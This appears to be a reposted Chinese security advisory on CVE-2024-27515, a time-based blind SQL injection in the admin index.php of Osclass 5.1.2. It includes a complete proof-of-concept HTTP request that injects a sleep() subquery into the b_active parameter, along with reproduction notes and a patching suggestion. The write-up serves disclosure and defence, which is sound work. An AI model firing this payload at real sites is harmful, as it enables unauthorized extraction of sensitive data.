CVE-2024-27515

admin 2024年3月31日21:56:59评论85 views字数 1253阅读4分10秒阅读模式

使

01

漏洞名称

Osclass 5.1.2 index.php sql注入漏洞

02

漏洞影响

Osclass 5.1.2 

Osclass是一个开源项目,地址如下,但start不多,感兴趣的自行搭建靶场

https://github.com/mindstellar/Osclass

03

漏洞描述

Osclass是一个免费的和开源的脚本,用来创建您的广告或列表网站。最佳功能:插件,主题,多语言,验证码,仪表板,SEO友好。Osclass 5.1.2版本中index.php接口处存在一个SQL注入漏洞,未授权的攻击者可以利用漏洞获取敏感数据。

04

漏洞复现

POC数据包如下,让执行sleep(4)

GET /oc-admin/index.php?b_active=(select(0)from(select(sleep(4)))v)&b_enabled=0&b_premium=1&b_spam=1&catId=10&city=San%20Francisco&cityId=San%20Francisco&countryId=USA&countryName=hebing123&direction=desc&iDisplayLength=10&page=items&region=NY&regionId=NY&sSearch=the&sort=date&user=hebing123&userId=hebing123 HTTP/1.1X-Requested-With: XMLHttpRequestCookie: osclass=b44r3de2iae3vmvm8at026v7vu; 54f78354eccc6e15622d3aaeccf02ca2=oc_adminId._.oc_adminSecret._.oc_adminLocale._.listing_iDisplayLength%261._.v5qMg6iJ._.en_US._.10Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflate,brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 192.168.160.147Connection: Keep-alive

CVE-2024-27515

确实延时4秒

再执行sleep(10),让睡眠10秒

CVE-2024-27515

响应时间超过10秒

漏洞复现成功

05

修复建议

开源项目,目前没有补丁,自行修改源码或者部署waf防护。

原文始发于微信公众号(AI与网安):CVE-2024-27515

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月31日21:56:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-27515https://cn-sec.com/archives/2614665.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息